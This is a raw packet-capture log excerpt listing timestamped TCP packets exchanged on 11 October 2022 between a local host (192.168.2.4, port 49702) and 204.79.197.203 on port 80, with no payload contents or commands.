Oct 11, 2022 15:04:06.452446938 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452460051 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452465057 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452478886 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452481985 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452497005 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452500105 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452517033 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452531099 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452533960 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452552080 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452558041 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452558041 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452569008 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452578068 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452588081 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452594995 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452605963 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452611923 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452624083 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452629089 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452641010 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452646017 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452657938 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452662945 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452675104 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452680111 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452692986 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452697039 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452709913 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452729940 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452743053 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452743053 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452743053 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452747107 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452765942 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452774048 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452783108 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452800989 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452811003 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452811003 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452819109 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452836037 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452842951 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452842951 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452855110 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452867031 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452872992 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452888966 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452891111 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452908993 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452925920 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452943087 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452943087 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452944040 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452959061 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452969074 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452977896 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452996016 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452997923 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.453013897 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.453021049 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.453032017 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.453048944 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.453051090 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.453067064 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.453069925 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.453083992 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.453100920 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.453107119 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.453119040 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.453129053 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.453149080 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.453174114 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.472738028 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472768068 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472785950 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472804070 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472821951 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472839117 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472857952 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472876072 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472893000 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472891092 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.472910881 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472929001 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.472929955 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472940922 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.472946882 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472965002 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.472965956 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.472982883 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473001003 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473007917 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473018885 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473033905 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473037004 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473053932 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473061085 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473073006 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473088026 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473089933 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473109007 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473121881 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473126888 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473143101 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473144054 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473161936 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473175049 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473179102 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473196983 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473212957 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473215103 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473229885 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473232985 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473249912 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473251104 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473267078 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473282099 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473285913 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473303080 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473311901 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473320961 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473340034 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473340988 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473356962 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473357916 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473373890 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473376036 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473392010 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473407984 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473407984 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473409891 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473427057 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473428011 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473444939 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473454952 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473463058 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473480940 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473483086 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473483086 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473499060 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473514080 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473514080 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473515987 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473534107 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473547935 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473547935 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473551035 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473562956 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473568916 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473584890 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473587036 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473603964 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473603964 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473620892 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473637104 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473637104 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473637104 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473639011 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473658085 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473674059 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473675013 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473692894 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473695040 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473711967 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473717928 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473737955 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473748922 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473748922 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473756075 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473771095 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473774910 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473793030 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473794937 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473809958 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473820925 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473820925 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473826885 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473845005 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473848104 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473861933 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473875046 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473887920 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473903894 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473922014 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473938942 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473939896 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473938942 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473954916 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473958015 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473964930 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473975897 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.473982096 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.473992109 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474005938 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474009991 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474026918 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474028111 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474045038 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474056005 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474062920 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474080086 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474082947 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474097013 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474111080 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474116087 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474133015 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474134922 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474150896 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474164009 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474169016 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474185944 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474200010 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474203110 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474217892 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474220037 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474236965 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474247932 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474253893 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474271059 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474272013 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474288940 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474301100 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474307060 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474323988 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474327087 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474343061 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474359989 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474359989 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474376917 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474392891 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474394083 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474410057 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474411011 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474428892 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474436998 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474447012 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474461079 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474463940 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474481106 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474489927 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474498987 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474503994 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474515915 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474529982 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474534035 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474551916 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474553108 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474570036 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474572897 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474586010 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474587917 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474601030 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474605083 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474617004 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474622965 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474631071 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474641085 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474654913 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474657059 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474670887 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474673986 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474690914 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474692106 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474701881 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474710941 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474725008 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474730015 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474740982 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474746943 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474761009 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474765062 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474771976 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474782944 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474796057 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474800110 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474809885 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474816084 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.474823952 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474849939 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.474872112 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:09.971949100 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:10.028846979 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.319344997 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.335999012 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.371227026 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.371294022 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.371303082 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.371346951 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.372000933 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.388750076 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.571872950 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.571933985 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.571955919 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.571971893 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.571988106 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.572005033 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.572005033 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.572021961 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.572038889 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.572040081 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.572091103 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575162888 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575207949 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575234890 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575264931 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575268984 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575290918 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575313091 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575315952 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575336933 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575359106 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575364113 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575381994 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575390100 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575416088 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575416088 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575438023 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575463057 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575483084 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575499058 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575517893 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575539112 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575562954 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575583935 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575602055 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575608969 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575634003 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575642109 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575654030 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575666904 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575680017 CEST	80	49702	204.79.197.203	192.168.2.4
